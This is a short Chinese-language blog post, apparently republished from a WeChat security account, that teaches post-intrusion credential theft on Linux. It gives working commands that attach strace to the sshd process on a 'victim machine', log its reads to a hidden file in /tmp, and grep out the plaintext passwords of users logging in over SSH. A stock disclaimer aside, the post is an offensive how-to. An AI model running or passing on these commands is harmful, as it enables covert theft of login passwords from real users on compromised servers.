Linux权限维持-SSH Keylogger strace

admin 2024年2月22日13:19:30评论8 views字数 734阅读2分26秒阅读模式
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关,如有侵权,告知即删并致歉,感谢!

strace是什么

strace是一个可用于诊断、调试和教学的Linux用户空间跟踪器。我们用它来监控用户空间进程和内核的交互,比如系统调用、信号传递、进程状态变更等。在后面抓取用户密码的时候,我们会使用这个软件来监控用户的ssh登录操作。

在我们打入了一台Linux机器后,翻文件,用漏洞,等操作都没有任何进展,这个时候可以尝试使用strace进行监听sshd记录登录到这台机子上的私钥和密码。

strace记录sshd明文

‌‌‌如果机器没有,可以安装一个,或者自己上传一个,strace可以记录登录到本机的密码。

yum install strace

‌‌‌在受害机上开启

(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> /tmp/.1234.log &)

‌‌‌当我们开启strace后尝试登录并查看密码

grep -E 'read(6, ".+\0\0\0\.+"' /tmp/.1234.log

‌‌‌  Linux权限维持-SSH Keylogger strace

‌‌‌这里本来还想写一下记录私钥,万万没想到,我找了一下午,试了一下午,我以为是我操作有问题,也问了chatgpt,都没有发现是什么问题,后续问了一位牛子,他跟我讲文章是假的,记录不了私钥,我也是无语。‌‌‌

如果有师傅复现可以记录私钥的话可以带带弟弟

点赞 将是对作者最大的鼓励,点击下方关注我!!!

原文始发于微信公众号(河马安全区):Linux权限维持-SSH Keylogger strace

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月22日13:19:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Linux权限维持-SSH Keylogger stracehttp://cn-sec.com/archives/2514295.html

发表评论

匿名网友 填写信息